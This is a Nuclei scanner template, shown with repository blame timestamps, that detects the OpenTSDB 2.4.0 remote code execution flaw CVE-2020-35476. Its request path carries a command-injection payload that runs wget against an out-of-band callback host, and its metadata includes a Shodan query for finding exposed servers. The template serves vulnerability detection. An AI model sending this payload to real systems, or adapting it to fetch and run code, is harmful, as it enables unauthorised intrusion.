nuclei-templates/http/cves/2020/CVE-2020-35476.yaml

52 lines
1.6 KiB
YAML
Raw Normal View History

2021-01-31 17:35:32 +00:00
id: CVE-2020-35476
info:
name: OpenTSDB <=2.4.0 - Remote Code Execution
2021-01-31 17:35:32 +00:00
author: pikpikcu
severity: critical
2023-01-02 09:21:39 +00:00
description: |
OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-35476
cwe-id: CWE-78
2023-08-31 11:46:18 +00:00
epss-score: 0.96323
cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.99341
2023-01-02 09:21:39 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-01-02 09:21:39 +00:00
shodan-query: html:"OpenTSDB"
2023-07-11 19:49:27 +00:00
vendor: opentsdb
product: opentsdb
tags: cve,cve2020,opentsdb,rce,packetstorm
2021-01-31 17:35:32 +00:00
http:
2021-01-31 17:35:32 +00:00
- method: GET
path:
2023-01-02 09:16:58 +00:00
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
2021-01-31 17:35:32 +00:00
matchers-condition: and
matchers:
2021-03-10 14:05:34 +00:00
- type: word
2023-01-02 09:16:58 +00:00
part: body
2021-03-10 14:05:34 +00:00
words:
2021-01-31 17:35:32 +00:00
- plotted
- timing
2021-02-03 11:19:03 +00:00
- cachehit
2021-03-10 14:03:49 +00:00
condition: and
2021-03-10 14:05:34 +00:00
2021-02-03 09:57:16 +00:00
- type: word
2023-01-02 09:16:58 +00:00
part: header
2021-02-03 09:57:16 +00:00
words:
- application/json
2023-01-02 09:16:58 +00:00
- type: status
status:
- 200